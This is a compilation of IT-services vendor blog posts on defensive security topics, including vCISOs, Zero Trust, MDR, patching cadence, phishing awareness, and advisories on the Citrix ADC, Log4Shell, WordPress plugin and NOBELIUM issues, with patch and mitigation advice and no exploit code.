Ultimately, Microsoft Teams is capable of meeting all security features and legal agreements of HIPPA compliance. Nonetheless, whatever tools are used, maintaining compliance relies on your organization and its ability to establish and enforce HIPPA policies and procedures.

Small businesses are the backbone of the American economy, yet they are often neglected when it comes to information security. While large businesses can afford to hire a chief information security officer (CISO) full-time, small businesses often cannot, leaving them vulnerable to data breaches and other cyberattacks.

However, there is a solution: hiring a virtual CISO (vCISO). A vCISO is a professional who provides information security leadership to an organization remotely. They are typically part-time and work with the business owner to advise on the business’s security. Is a virtual CISO right for you? In this article, we’ll look at the benefits of hiring a virtual CISO, their limitations, and what to look for when hiring.Virtual

Why Consider Hiring a Virtual CISO

Ideally, every company would have experienced in-house information security leadership. However, even when a business has the budget, talent can be hard to come by. Virtual CISOs are a great solution to budget and talent concerns. They typically cost less than half of what a full-time CISO costs and are available when you need them.

That said, it’s important to understand what a virtual CISO brings to the table. Virtual CISOs serve as advisors that can help you develop and implement a security plan that meets your business needs. You can often find someone who has experience in your specific industry and can take into account regulatory standards like HIPAA.

Virtual CISOs also focus on bringing the right people on board and designing processes that keep your business secure. While an engineer can help you with the tactical implementation of your security program, people and processes are key to protecting data long-term. This focus is the sweet spot for CISOs.

The Limitations of a Virtual CISO

Since they are not a permanent member of the team, virtual CISOs serve as advisors rather than project owners. Therefore, a vCISO does not have the same level of authority as a full-time CISO. This difference can lead to communication issues between the virtual CISO and other team members.

Another difference between a virtual and full-time CISO is that your team will ultimately be responsible for the implementation and management of the budget. These limitations may cause problems for businesses with extensive attack surfaces or those who operate in heavily regulated industries. A final consideration is cost. While a vCISO is significantly cheaper than a full-time employee, the cost may still be too high for smaller firms to take on.

However, security is something businesses of all sizes need to take seriously. So, while the cost of information security leadership may seem steep, data breaches and legal action are much higher. That’s why many businesses bolster their organization’s security through CISO leadership. The key is analyzing your company’s needs and finding the right talent.

When hiring a virtual CISO, consider the individual’s experience and qualifications. The virtual CISO should have a deep understanding of information security in your industry. A CISO like that is more likely to be proactive and think outside the box when creating solutions to novel security challenges.

A vCISO should also be able to communicate effectively with employees at all levels of the organization. Since the virtual CISO will be working with your team closely in a leadership role, they must be able to build relationships and establish trust. Hence, a virtual CISO should be a good fit for your company culture.

Ultimately, hiring a virtual CISO is an important decision that can help protect your business’s data and reputation. But finding the right person can be an intimidating task. Our team at OneNeck can help you analyze your security needs and advise you on the best options available to you. Contact us to learn more.

Ten questions to ask before hiring a vCISO:

1. What is your company’s budget?
2. What are your company’s security goals?
3. What is your company’s current security posture?
4. What are your company’s compliance requirements?
5. What is your company’s threat landscape?
6. What experience does your vCISO need to have?
7. What availability do you need from your vCISO?
8. What services are necessities, and which are nice to have?
9. What rates and pricing model are you comfortable with?
10. How will you work with your vCISO?

Citrix Security has discovered a vulnerability in Citrix ADC (formerly Netscaler) and Citrix Gateway, enabling an attacker to create a specially crafted URL redirecting to a malicious website. Citrix and OneNeck highly recommend that all customers utilizing these Citrix services take note of this vulnerability and determine if they are among those who may be affected.

Vulnerability Description

The vulnerability (CVE-ID: CVE-2022-27509 and CWE: CWE-345) is an unauthorized redirection to a malicious website. Additionally, two pre-conditions determine potential susceptibility. The first is that appliances must be configured and operating as a VPN (Gateway) or AAA virtual server. Secondly, the targeted victim must use an attacker-crafted link.

Affected Versions

According to Citrix, the following supported versions of Citrix ADC and Citrix Gateway have been affected by this vulnerability:

• Citrix ADC and Citrix Gateway 13.1 before 13.1-24.38
• Citrix ADC and Citrix Gateway 13.0 before 13.0-86.17
• Citrix ADC and Citrix Gateway 12.1 before 12.1-65.15
• Citrix ADC 12.1-FIPS before 12.1-55.282
• Citrix ADC 12.1-NDcPP before 12.1-55.282

A critical aspect of which to note is that organizations using Citrix-managed cloud services are not in danger of being affected by this vulnerability and do not need to take additional action. However, those with customer-managed ADC and Gateway appliances should take the following steps.

The Solution

Citrix recommends those who are currently affected or could potentially be in the future install all relevant updated versions of Citrix ADC or Citrix Gateway.

Updated Versions:

• Citrix ADC and Citrix Gateway 13.1-24.38 and later releases
• Citrix ADC and Citrix Gateway 13.0-86.17 and later releases of 13.0
• Citrix ADC and Citrix Gateway 12.1-65.15 and later releases of 12.1
• Citrix ADC 12.1-FIPS 12.1-55.282 and later releases of 12.1-FIPS
• Citrix ADC 12.1-NDcPP 12.1-55.282 and later releases of 12.1-NDcPP

OneNeck Can Help!

Based on the potential harm these vulnerabilities could cause an organization, OneNeck recommends installing updated versions immediately, and our experienced team is here to help. Through our long-standing partnership with Citrix, we will quickly and effectively assess your Citrix appliances and determine which units face the potential of being affected. We will install all necessary updates so that you can get back to doing what you do best, knowing that you and your clients are protected. So, please Contact Us or your account rep today and let us help you continue to run efficiently, effectively and securely.

The Zero Trust Network, or Zero Trust Architecture, model was created in 2010 by John Kindervag, who at the time was a principal analyst at Forrester. He defined it as a security concept centered on the belief that an organization should not automatically trust anything inside or outside its perimeters and instead verify anything and everything trying to connect to its systems before granting access.

Cisco lays out the original tenants of a Zero Trust network as follows…

At the core, even though Zero Trust has been defined by many in different ways, the message is always same – only allow “just in time access” to resources on premise or in the cloud in your organization, and treat all applications and resources as internet-facing. But this concept can send many an IT pro into a spiral. What about critical infrastructure? What about VPNs? How do you do this? Why is this better?

Why all the Zero Trust fuss?

Let’s take a step back and look at why Zero Trust is getting so much traction in the first place. This comes down to a few things – the growth and severity of security incidents in recent years, and how organizations are trying to stop and defend against those threats. The defending teams in organizations (aka “blue teams”) have been losing this threat war for a while now. It seems that breaches happen more and more, and the adage is not if but when.

So, why the increase in breaches? Security budgets are increasing. More professionals are being trained. More security products are available. So, it only stands to reason that blue teams should be seeing a decline in breaches, but we are not.

Possible reasons for the increase abound. Some see the security frameworks we use as the issue. Others blame the changes in access to IT resources since COVID. Now organizations have employees and customers access data, applications and infrastructure in both cloud and on-premises scenarios, accessing that data from anywhere. Our older security models made it harder to gain access to those things and maybe allowed too much access for too long, and our digital identities were not sufficiently protected.

This brings us back to Zero Trust. This new access need with data being in the cloud, via SaaS and on premise dictated a new security model to meet these new requirements. In future blogs, I will break down this Zero Trust more in-depth, helping you navigate the pros and cons of a Zero Trust approach in your organization. Stay tuned!

Cyber insurance is getting harder for companies to find — and it’s likely going to get harder. While cyber insurance is becoming more of a must-have for businesses, the explosion of ransomware and cyberattacks mean it’s also becoming a less enticing business for insurers. (Source: Harvard Business Review)

This quandary is putting today’s business in a tough spot. Cyber insurance is important, but in order to secure a policy, premiums are steep (and climbing) and the requirements to qualify are also growing. To keep premium costs affordable, insurers are requiring a comprehensive list of good hygiene practices around security controls. These include:

• Multifactor authentication (MFA) for remote access and admin/privileged control.
• Endpoint Detection and Response (EDR).
• Secured, encrypted and test backups.
• Privileged Access Management (PAM).
• Email filtering and web security.
• Patch management and vulnerability management.
• Cyber incident response planning and testing.
• Cybersecurity awareness training and phishing testing.
• Hardening techniques including Remote Desktop Protocol (RDP) mitigation.
• Logging and monitoring/network protections.
• End-of-life systems replaced or protected.
• Vendor/digital supply-chain risk management.

While the list above may seem overwhelming, each one is key in maintaining a defense against attack, as well as providing a roadmap to more efficiently address the growing demands to maintain cyber insurance.

What if cyber insurance isn’t an option?

Having cyber insurance is always an important element to include in a company’s security program. However, we are also seeing situations where coverage may not be obtained because:

• Insurers are moving away from providing coverage for certain types of ransomware events and/or adding huge increases in deductibles to provide these types of coverage.
• Customers want to add or obtain coverage for the first time and can’t find an insurer willing to cover them.

When customers are faced with the option of not being able to obtain insurance, then the most important approach is to make investments in their security program.

An effective security program doesn’t always mean more tools.

At OneNeck, we take a different, “non-tool” approach to security first. Instead of starting with point solutions, we align with the Center for Internet Security’s Security Controls as a framework that provides a prioritized set of actions that address security gaps, which then later aligns with tools. In fact, we believe so strongly in the CIS Controls that we use them in our own business as a Managed Services Provider (MSP) that must pass rigorous annual compliance audits.

The CIS Controls allow our clients to understand where they are from a security risk perspective and then build out a step-by-step security plan that aligns to their unique environment.

OneNeck – We’ve got your back.

Whether it’s a service, an infrastructure solution or a cloud solution, we are here to help you decide what the best, most-secure course of action should be.

We proactively work with our customers to understand their current security controls, provide recommendations on how to better leverage the current investments in people, process, and tools. We then provide recommendations for the next investments, that will not only provide better security for their business, but also provide a roadmap to more efficiently and timely address the growing demands to maintain cyber insurance.

We live in an age when passive security isn’t enough to protect company infrastructure. Security solutions must seek out and respond to unknown threats. Managed detection and response (MDR) provides companies with the security capabilities they need for the modern era.

MDR is an outsourced cybersecurity solution that seeks out and remediates threats that standard security controls miss. There are two factors that make MDR services a must-have for organizations. One is the lack of available cybersecurity talent. According to the annual Cybersecurity Workforce Study by ISC, there were 2.7 million unfilled cybersecurity positions in 2021. The second factor is the abundance of collected data at the enterprise level and the need to protect it.

With that in mind, we’ll dive into the challenges MDR solves and the benefits of implementing it in your business.

Seek and Destroy Security Threats With Managed Detection and Response

New technology can make your business more agile, profitable, and capable. However, it can also make security increasingly complex. Since companies need new technologies to thrive, it’s essential to keep security robust enough to handle the change. Consider five challenges managed detection and response addresses.

1. Lack of cybersecurity talent. MDR counters the talent shortage by providing businesses with access to a fully-trained team of security experts. The outsourced organization handles talent acquisition and training. Thus, organizations get an instant injection of cybersecurity expertise.
2. Alert fatigue. Teams are often inundated with security alerts. The sheer volume of alerts makes it difficult to sift through the noise and find malicious threats. MDR lightens the load by using active scanning technology to detect and analyze threats automatically.
3. Protect against lateral movement. Once a bad actor gains access to your system, they’ll attempt to move deeper into your network and increase their control. MDR can detect this activity and limit the impact an attack has on your system.
4. An increasing number of endpoints. The amount of devices your organization has to protect continues to increase. From edge devices to remote work hardware, your organization needs a holistic approach to security. MDR uses a network intrusion detection system (NIDS) which employs signature-based behavioral analysis to filter through millions of connections. The NIDS then passes on the threats that need further inspection to the MDR team.
5. Access to advanced security technology. An MDR firm uses machine learning and AI technology to analyze and sift through massive amounts of data. This advanced technology is expensive and may be beyond the reach of many organizations. However, when working with an MDR firm, you get access to the advanced toolsets of a dedicated security company.

To sum up, managed detection and response gives teams of all sizes the security expertise and technology needed to protect against modern threats.

Leverage Partner Expertise for Enhanced Security

The security landscape continues to become more complex. Increasingly sophisticated attacks, more endpoints to protect, and talent shortages require innovative security solutions. You need cost-effective solutions that can detect intrusions, malware, and other malicious activity — helping you take rapid action to eliminate or limit the damage.

Finding technology partners to power your applications and protect your data is challenging. OneNeck provides services for your security needs, including MDR, endpoint protection, backup, disaster recovery, and more. For MDR, we partner with Alert Logic to provide you with advanced threat protection.

Here are four benefits you get from this strategic partnership:

1. Centralized platform. Alert Logic’s platform covers all of your workloads, wherever they may be. Everything is managed from a single location in the cloud.
2. Threat and response expertise. Work with a team of security researchers, data scientists, and engineers who have years of experience analyzing security threats.
3. 24/7 monitoring. Your network is being monitored constantly, and OneNeck security experts are alerted within 15 minutes of any critical incident.
4. Large talent pool. Alert Logic has 150 SOC analysts who partner with OneNeck’s security team to provide you with comprehensive coverage.

Our team helps manage security so you can focus on providing the best service to your customers. Through strategic partnerships, we ensure there are no gaps in your coverage. We have the experience to implement technology solutions for organizations of all sizes. Talk to our team about how you can implement MDR in your business today.

Want to learn more about MDR’s critical role in your cybersecurity strategy?  Check out the MDR Resource Library.

Businesses are increasingly dependent on technology. And data is essential to the efficiency of that technology as well as future business decisions. With its increased use in business operations comes a larger attack surface. So, shouldn’t companies that prioritize technology also prioritize security?

Yes, especially when you consider the frequency that malware is released. The  AV-TEST Institute registers over 450,000 new malicious programs and potentially unwanted applications every day. On top of that, remote work has exploded since the beginning of the pandemic. The sheer volume of malware and growing endpoints, especially unknown endpoints from BYOD, has put a spotlight on security concerns.

This new environment has pushed companies to look for advanced security solutions that can protect against more intelligent and widespread malware. Endpoint security is designed to be that advanced solution.

What is endpoint security?

Endpoints are devices connected to your company’s network. These can range from servers, personal computers, mobile devices, and even IoT devices like smartwatches. When you consider the range of devices, it’s easy to see why there are security concerns. But to fully protect enterprise infrastructure, a new layer is needed.

Traditional antivirus software methods take a preventative approach to security, intercepting known threats before they enter the system. While this is an important security component, the sheer quantity of malware created daily means that databases will always have gaps in knowledge. Additionally, antivirus software is typically installed and managed at the user level, restricting the control and access capabilities of security admins.

Endpoint security improves on traditional antivirus technologies in several key ways:

• Continuous detection capabilities. With large amounts of malware created every day, it’s unlikely that your preventative defenses will recognize every threat and be able to defend against them. Endpoint security continuously monitors devices on the network to detect abnormal file behavior, leveraging AI and machine learning. It can then add new malware entries to the cloud for preventative detection.
• Cloud-based malware registry. Antivirus software used to rely on downloadable databases to ensure your software was updated on the latest malware. However, this process depends on user updates which are slower and unreliable. Cloud-based solutions allow endpoints to share a single database that’s always updated with known threats — eliminating security holes from endpoints that are slow to update.
• Unified admin controls. Managing an organization full of devices is hard enough, but the challenge is multiplied when using varied software solutions and processes. Endpoint security provides a single dashboard for all users and devices. Additionally, security admins have the needed controls to act when threats arise.

By combining preventative security with continuous detection and response capabilities, endpoint security helps companies defend against a growing number of threats.

Secure Your Network with OneNeck and Cisco

Data is one of your business’s most valuable assets and is also one of the most vulnerable. Security admins must protect devices that vary widely and are located in different regions, even more so since COVID has pushed many companies to leverage remote work in their operations. OneNeck partners with best-in-breed partners like Cisco to provide modern endpoint security that helps keep your data safe.

Endpoint protection is designed to prevent known threats, detect new ones, and respond to eliminate them promptly. Cisco Secure Endpoint uses the cloud to provide the latest threat intelligence, as well as advanced algorithms to detect new threats and rapidly respond to them — isolating the endpoint to mitigate damage and remediating malware across all devices.

Cisco Secure Endpoint brings together endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities in a unified solution, and it eliminates the need to manage separate solutions for complete coverage while simplifying deployment and management tasks.

OneNeck Simplifies the Integration of Your Security Solution

Security is essential, but we realize it’s only one piece of your network. Time is limited, and you need solutions that work reliably and reduce the complexity. OneNeck can advise you on the strategies and solutions you need to keep your endpoints safe and protect your data. Contact us to learn how you can protect against threats in real-time.

Organizations are in a hurry to mature their cybersecurity programs. Whether it is world events, prior incidents, or just the desire to be security conscious that is driving these efforts, there is one thing that makes these efforts less complicated along the journey – develop your cybersecurity policy framework first.

Developing a policy framework to support your cybersecurity program can seem daunting and is often left for last when prioritizing a 2-, 5- or even a 10-year roadmap. By creating a policy framework at the beginning of your roadmap, you lay the foundation for decision making that can be followed and referenced during the project lifetime and beyond.

A strong policy foundation will help facilitate the tracking, guidance, and enforcement of your cybersecurity program. Building a policy framework can be as simple as starting with one policy that encompasses the most important aspects of your cybersecurity infrastructure. The Center for Information Security (CIS) has a great template to use when starting this effort.

Check out this CIS example of a completed Information Security Policy, which can be used as a template by editing details to better reflect your organizational environment.

As you develop your program’s policy framework, be sure to…

• Build in requirements for annual reviews (at minimum) to ensure your policies are adapting to organizational changes and technological advancements.
• Also consider that as your policies mature, it may be necessary to document supplemental processes, standards, guidelines, etc., to fully support your policies.

By creating a simple policy framework at the beginning of your roadmap, you create the guidance necessary for configuring tools, training employees, protecting data, and more. Having a policy framework already available, lets you build out your program to match your policy, instead of trapping yourself into writing policy based on your program after it is implemented.

We’ve got your back.

If you’re not sure where to start with your security framework and would like to talk with one of OneNeck’s security experts, we are here to help.

As the world watches Russia’s conflict with Ukraine, US services providers, like OneNeck, operating critical infrastructure are watching closely as cyber risk increases with any physical conflict. The FBI, CISA and the National Security Agency put out a joint advisory in January about potential cyberthreats against US critical infrastructure. CISA also warned US companies to protect their IT systems against destructive wiper malware, which has been used against targets in Ukraine.

At OneNeck, our security teams across the OneNeck/TDS organization are closely monitoring the events related to this conflict.  As a telecommunications and service provider, we include ourselves as a key contributor to critical infrastructure, and have been evaluating all alerts from the CISA for the last several months, and we are constantly evaluating our security posture in alignment with those alerts.

Overall our core strategy is to stay disciplined and stay the course related to prior assessed risk reduction activities while increasing awareness and visibility to potential threats in this emerging area.  We have a solid foundation of controls that are monitored in the environment and multiple additional controls in the procress of being implemented to further reduce risk, in alignment with the recommendations that CISA Shields Up states.

The following are some key activities that teams across our organization have been performing in preparation:

• Reviewing CISA advisories, briefings and checklists of protections to ensure recommended controls are in place and operating effectively.
• Implementing increased threat monitoring of potential suspicious activities.
• Reviewing security vendor advisories and verifying increased threat monitoring in security tools is activated.
• Increasing communications to our associates on heightened awareness
• Reviewing security risk mitigation objectives to determine if any priorities should shift.

Since traffic can easily come from anywhere in the world, it is incredibly important to have a full security program, and as CISA recommends, at a minimum…

• Update your operating system and software.
• Implement user training and phishing exercises to raise awareness about the risk of suspicious links and attachments.
• If you use Remote Desktop Protocol (RDP), secure and monitor it.
• Make an offline backup of your data.
• Use multifactor authentication (MFA).

OneNeck – We’ve got your back.
We know these can be stressful times, so if you’d like to talk with one of OneNeck’s security experts regarding this situation and ensure your security defenses are sufficient to keep you safe, we are here to help.

Ransomware continues to be the top threat to today’s organizations, with healthcare topping the list of verticals most at risk, putting millions of patient’s personal and financial data at risk, according to a recent threat summary report from Cisco Talos. Additionally, healthcare facilities are uniquely affected when breached, as it’s not just dollars lost as with manufacturing or enterprise – lives are potentially at stake.

The pandemic has further exacerbated security risks and strained IT teams at healthcare organizations as they’ve increased their remote work and telemedicine, making them even more vulnerable to bad actors. So, what should healthcare IT leaders do to ensure they’re not the next big news story?

OneNeck CISO, Katie McCullough, says, “Per the HIPAA Security Rule, the first step in identifying and implementing safeguards that keep healthcare organizations safe is to conduct a risk assessment. It’s foundational in protecting electronic health information. At OneNeck, our approach is to evaluate a healthcare organization’s current security capabilities against the Center for Internet Security’s recently published version 8 CIS Controls, and to provide an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity and availability of their electronic protected health information.”

The Security Rule regulations addressed in this assessment are divided into administrative, physical, and technical safeguards.

• Administrative Safeguards:
  • Risk management process
  • Security personnel
  • Information access management
  • Workforce training and management
  • Periodic assessments
• Physical Safeguards:
  • Facility access and control
  • Workstation and device security
• Technical Safeguards:
  • Access control
  • Audit control
  • Integrity controls
  • Transmission security
  • Encryption

Katie continues with, “As the most-targeted industry, today’s healthcare organizations can’t afford to not proactively address these critical security safeguards. There’s just too much at stake. But don’t go it alone. An experienced security partner like OneNeck can bring the outside perspective and deep industry knowledge that will help a healthcare organization identify their risks and prioritize a mitigation plan that will keep the bad guys out and keep sensitive patient information safe.”

Want to talk to a OneNeck security professional? We’re here to help.

Maintaining your organization’s security is an ongoing process that never ends. With security threat constantly evolving, your defenses have to evolve too. That’s why many organizations choose to work with a managed service provider like OneNeck, which offers technology expertise at a scalable cost and built-in security processes that keep customers safe from attack.

As OneNeck’s CISO, I lead the directive on patching frequency, and I’m often asked what goes into determining the timing of our patching schedule. When it comes to patching, we follow an every-30-day approach, and here’s why…

Consideration 1
Patching for vulnerabilities requires some risk analysis to understand and balance the cybersecurity risk and the business functionality risk.  The risk analysis needs to consider the severity and impact of vulnerability being patched, as well as assessing for potential adverse/unintended impact to users and business applications or processes.  Based on most vulnerabilities, a 30-day patching cycle allows for the balance of assessing the patches being released and proper business testing.

Additionally, statistics in annual breach reports identify that most vulnerability exploits happen due to devices not being patched for months/years (see chart here from Verizon 2021 Data Breach Report.)

However, for zero-day vulnerabilities, the severity/impact can be significant, and we would completely agree that >30 days is typically not sufficient.  Frequently, a zero-day vulnerability has bad actors actively exploiting the vulnerability; therefore the cybersecurity risk is known to be high, the risk to the business functionality is recognized, and patching happens immediately.

OneNeck’s process for zero day vulnerabilities includes same-day notification to customers, <24 hours technical teams assess vendor provided workarounds or patches (if available), and our security teams assess the vulnerability for known exploits or other mitigating factors.  If factors warrant immediate patching, OneNeck provides that recommendation to customers and schedules the Change Record based on the customer’s business approval.

Consideration 2
At OneNeck, we highly recommend and work with our customers to take a Defense in Depth approach to cybersecurity. Defense in Depth refers to an approach in which a series of security mechanisms and controls are purposefully layered throughout a computer network to protect the confidentiality, integrity, and availability of the network and the data within.

These security controls include vulnerability management, which defines the need to complete timely patching, but also needs to include heuristic anti-malware protection, responsive 24×7 security monitoring, boundary control, and access and identity management to name a few.  With appropriate adoption of Defense in Depth, it is our perspective that then you can take the appropriate time to do the risk analysis for patching vulnerabilities balancing the cybersecurity risk and the business functionality risk.

Exceptions to the Rule
There are always exceptions, as noted above with zero-day vulnerabilities, a particular business critical device, or a device that Defense in Depth cannot be applied to, and in those situations, a more aggressive patch cycle should be considered.  However, for good security hygiene, OneNeck aligns with global security frameworks such as the Center for Internet Security (CIS Controls), whose guidelines recommend performing operating system updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.

We’re here to help.
Maintaining a hardened security posture can weigh on the most seasoned IT professional, but you don’t have to go it alone. As a managed services provider, we’ve seen it all, and as a security services provider, we’ve helped many customers prevent, detect and respond to cyberthreats. So, let us know how we can help. We’ve got your back!

Your company may fear shadow IT because it limits its visibility into the applications on your network. Many organizations take the easiest path, which is to ban the use of any unapproved applications. However, this strategy may prove ineffective and even limit the productivity of your people.

Employees typically install unapproved applications because they’re trying to be more productive, not for any malicious reason. Still, these applications present a security risk, since it’s likely that employees will occasionally send sensitive information using these mediums — leaving IT with no way to mitigate risk.

This situation presents your IT team with a challenge. How can they ensure that the company’s network remains secure while empowering employees to do their best work?

Bring Balance to Your Shadow IT Mitigation

Most CIOs and IT professionals recognize that they will inevitably have a certain amount of shadow IT. But, when there is a culture of transparency and flexibility, it encourages employees to work with IT and bring this situation under control. If employees know that they will not be listened to and the company will block their efforts, they are unlikely to communicate their application needs. How can your business counteract this tendency?

The first step is to open the doors of communication. Show employees that you’re listening by integrating applications when possible and educating them on alternatives when it’s not. This attention to their needs will confirm your company is listening and reduce the number of employees who work around the company’s security policies.

Business leaders should also acknowledge that shadow IT can be a symptom of employees who feel that they don’t have all the tools they need. Instead of reprimanding them, IT can strive to figure out why they work around security policies. This understanding will help them implement controls that allow applications to be used with certain safeguards.

Using policies and software to manage apps that aren’t part of your organization’s tech stack is a great way to mitigate shadow IT. It has the two-fold benefit of showing employees you care about their needs and helping them improve productivity. While enabling some applications will be impossible, there are many instances where IT leaders can say yes.

Your team can limit shadow IT risk by using software controls that limit the access of certain applications. For example, IT can enable employees to download from a particular platform without letting users upload files. This allows users to access necessary documents from business partners and customers while ensuring sensitive information isn’t shared on that platform.

Another way to protect against shadow IT risk is to control which instances of applications employees can access. For example, you can allow employees to access their corporate Google account while restricting access to a personal account where they could accidentally upload sensitive data.

Creating a culture of transparency and integration is a great goal. However, it’s essential that your team have the tools they need to detect and isolate shadow IT applications that are a security risk for your organization. Your tech stack should include software that helps IT monitor the network to identify possible security gaps. When your team and software work in unison, IT will have the visibility and control they need to ensure security requirements are met.

Collaborate with IT Leaders to Empower Your Employees

Disconnects between IT and business leaders can inhibit your team’s ability to support employee needs. This reality makes it essential for your company to include IT in important business conversations, especially those that have to do with computing infrastructure and applications. IT can then communicate the shortcomings they perceive in the organization’s systems and tools.

Shadow IT shouldn’t be shut down without a thought. Acting this way can have a damaging effect on employee productivity and morale. Instead, companies should find a way to open up communication and embrace a culture where shadow IT can be approved and secured.

CIOs are pivotal in fostering collaboration between IT and employees. They safeguard the company through carefully developed procedures without making security feel like a dystopian overlord. However, you may realize that you lack the necessary cloud tools to empower employees. OneNeck can help you integrate needed technologies into your tech stack securely and ensure they are ready to scale as needed. Contact us to learn more.

There is a new zero-day vulnerability for the Apache Log4j Java library, and it is being actively attacked right now. The bug, now tracked as 
CVE-2021-44228 and dubbed Log4Shell or LogJam, is an unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1. There are many applications this can and will affect, from a variety of open source projects to vendor supplied solutions.

Here  are some of the major Apache frameworks that are affected by this exploit. Many applications make use of these frameworks as well as many just make use of the log4shell log tool.

• Apache Struts2
• Apache Solr
• Apache Druid
• Apache Flink

Currently there are some mitigations that can be used. So seek out assistance for any vendor-supported applications you are running. There is also a thread discussing mitigations for this issue.

We are advising our customers to look into what java-based applications are affected in your environment, starting with anything that is internet facing. This Zero is actively being attacked right now.

Current recommendations (as of Dec 20) are:

• log4j v1: Version 1.x of log4j is vulnerable to RCE attacks (like CVE-2019-17571), and if you’re using it you need to migrate to 2.17.0
• log4j v2.x: External systems with log4j v.2.16 or less should be prioritized first, but all impacted systems should migrate to 2.17.0.  Version 2.16.0 appears to resolve the RCE exploits, but is vulnerable to a new DoS attack.
• Can’t update? Additional mitigations include removal/disabling of Log4J, deploy a WAF, network isolation, and configuration changes depending on the software and vendor recommendations.  See sources below for additional information or check vendor websites for specific software recommendations.
• Sources for these recommendations:

• • https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/
  • https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures

Listed below are some additional informational links:

• CISA Mitigation Options – https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures.
• Suggestions from Apache – https://logging.apache.org/log4j/2.x/security.html
• https://www.lunasec.io/docs/blog/log4j-zero-day/
• https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
• https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
• https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/

Regarding OneNeck Systems

Regarding OneNeck’s  systems, no immediate threat has been detected, but our teams are actively reviewing the situation to determine any impact on our products and partners.

It’s that time of year, where twinkling lights and Santa’s sleigh full of toys are everywhere. But with all the holiday bustle comes additional risk, the risk of mounting security threats as shoppers are eagerly swiping their credit cards while checking gifts off their lists. What does this mean for today’s organization, where the line between corporate and personal devices is blurrier than ever before?

With the rise in remote work, companies and organizations need to update their security policies and controls. Based on IDG’s 2021 Global Intelligence Report, 67% of organizations expect their security budget to increase this year. However, despite the increased security, key gaps remain, and additional policies need to be implemented for the remote workforce.

Be Aware of Holiday Inspired Phishing Emails
It’s unfortunate, but the “bad guys” are incredibly skilled at crafting meaningful emails, and with the holiday season, all sorts of creative phishing emails are bombarding the end user who might be thinking they are getting the latest-and-greatest 55” TV for $200, only to result in malware being download and potentially impacting all it touches.

And while TechTarget says most end users “think they know enough about the internet to not fall prey to these attacks, and that the cyberattacks they see in the news couldn’t possibly happen to them,” it’s this false sense of security that can ultimately lead to a disastrous breach.

Educate Your Staff to Watch Out for Phishing Attempts

It’s stats like the above that are keeping many IT leaders up at night. So, what’s an organization to do? OneNeck CISO Katie McCullough says, “It starts with end-user awareness. That’s your biggest potential for risk. It’s the age-old, phishing is the #1 way to exploit a company, and the bad guys are always going to be out in front of that. There’s always detection and prevention you can do at a technology level, but the more you can educate the co-workers in your business to be savvy and don’t click, even though it sounds basic, it’s these best practices that companies must constantly reinforce with their end users. They can invest all they want in technology, but if you’re not focused on training and reinforcing that training with your broad co-worker base, all it takes is one click.”

Key Steps to Prevent Cyber Breaches at Your Organization

Like anything where the human factor is involved, repetition is crucial, as is the right combination of technology and processes. This can include:

• Annual security-awareness training
• Quarterly updates, blogs and communication to keep it top of mind
• The right mix of security technologies to stop malware and block access to malicious sites
• Anti-phishing training, which enables IT to send fake phishes to employees, exposing the vulnerabilities

Ultimately, don’t fall into the trap of, “It hasn’t happened yet, so why should I worry?” It takes a diligent and continuous approach to mitigating constantly evolving security threats. But with a strategy that considers those personal devices and continuous employee education, the holidays don’t have to be the scariest time of the year.

Want to learn some more useful security tips? Check out our exclusive IT Professional’s Security Strategy Toolkit.

A high-severity security flaw found in a WordPress plugin that has 8,000+ active installs can allow authenticated attackers to reset and wipe vulnerable websites.

This plugin, Hashthemes Demo Importer, was developed to assist admins when importing demos for WordPress themes to import the full demo with one click.

According to Wordfence’s QA engineer and threat analyst Ram Gall, “The flaw gives any authenticated attacker, even the subscriber-level user with minimal permissions, the ability to reset WordPress sites by zapping virtually all its databases and uploaded media.” He goes on to say that “if exploited, the flaw would render a website running the vulnerable plugin completely unrecoverable, unless of course its owners had properly backed it up.”

Note that a corrected version (version 1.0.7) has been uploaded by the plugin’s developer.

While this vulnerability is specific to WordPress users, it’s a prime example that plugins expand the attack surface. OneNeck CISO Katie McCullough states, “Best practice is to use the fewest number of plugins needed to complete work, and uninstall any plugins not being used. And specific to this vulnerability, ensure WordPress and plugins are updated to the latest versions and have the most recent patches applied.”

An effective security defense really starts with the basics. As Katie states, “Some companies think they can deploy patches on a quarterly basis or put them off indefinitely because they want to avoid downtime, but we’ve seen how costly such decisions can be.”

So, moral of the story, be diligent in your updates and patching. Good cyber hygiene can be what keeps your organization safe from bad actors.

Interested in talking to one of our security experts? Contact us today.

Today the Microsoft Threat Intelligence Center (MSTIC) released a statement regarding the threat actor, NOBELIUM, who launched a campaign against cloud service providers (CSPs), managed service providers (MSPs) and other IT services organizations. By targeting IT providers, they are attempting to gain access to privileged customer accounts so they may move laterally throughout the cloud environment and gain access to downstream customers and systems.

Microsoft Recommendations to Protect Privileged Access

Microsoft recommends that customers that use service providers with elevated privileges review and implement the following actions to help mitigate and remediate the recent NOBELIUM activity.

1. Review, audit, and minimize access privileges and delegated permissions

• Review, harden, and monitor all tenant administrator accounts: All organizations should thoroughly review all tenant admin users, including those associated with Administer On Behalf Of (AOBO) in Azure subscriptions and verify the authenticity of the users and activity. We strongly encourage the use of strong authentication for all tenant administrators, review of devices registered for use with MFA, and minimize the use of standing high-privilege access. Continue to reinspect all active tenant admin users accounts and check audit logs on a regular basis to verify that high-privilege user access is not granted or delegated to admin users who do not require these to do their job.
• Review service provider permissions access from B2B and local accounts: In addition to using the delegated administrative privilege capabilities, some cloud service providers use business-to-business (B2B) accounts or local administrator accounts in customer tenants. We recommend that you identify whether your cloud service providers use these, and if so, ensure those accounts are well-governed, and have least-privilege access in your tenant. Microsoft recommends against the use of “shared” administrator accounts. Review the detailed guidance on how to review permissions for B2B accounts.

2. Verify multi-factor authentication (MFA) is enabled and enforce conditional access policies.

• MFA is the best baseline security hygiene method to protect against threats. Follow the detailed guidance on setting up multifactor authentication
